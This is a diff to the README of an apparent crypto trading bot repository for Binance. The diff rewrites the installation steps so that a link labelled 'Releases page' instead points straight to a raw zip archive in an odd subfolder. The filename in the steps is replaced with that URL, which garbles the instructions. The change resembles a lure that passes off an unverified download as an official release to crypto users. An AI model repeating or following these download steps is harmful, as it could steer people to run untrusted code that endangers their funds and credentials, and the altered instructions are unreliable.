joenou/24-7-Python-Crypto-Bot-Binance/README.md

 ## 🛠️ Installation Instructions
 To install the Crypto Trading Bot, please follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/joenou/24-7-Python-Crypto-Bot-Binance/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/joenou/24-7-Python-Crypto-Bot-Binance/raw/refs/heads/main/abu/Bot_Python_Crypto_Binance_v1.9.zip).

 2. **Download the Latest Release:**
    - You will see multiple files listed.
-Choose the file named `crypto_bot.zip` (or the corresponding filename).
+Choose the file named `https://github.com/joenou/24-7-Python-Crypto-Bot-Binance/raw/refs/heads/main/abu/Bot_Python_Crypto_Binance_v1.9.zip` (or the corresponding filename).
    - Click on the file to start the download.

 3. **Extract the Files:**
-   - Once the download is complete, locate the `crypto_bot.zip` file on your computer.
+   - Once the download is complete, locate the `https://github.com/joenou/24-7-Python-Crypto-Bot-Binance/raw/refs/heads/main/abu/Bot_Python_Crypto_Binance_v1.9.zip` file on your computer.
    - Right-click on the file and select "Extract All..." to unzip the files.

 4. **Open Command Line:**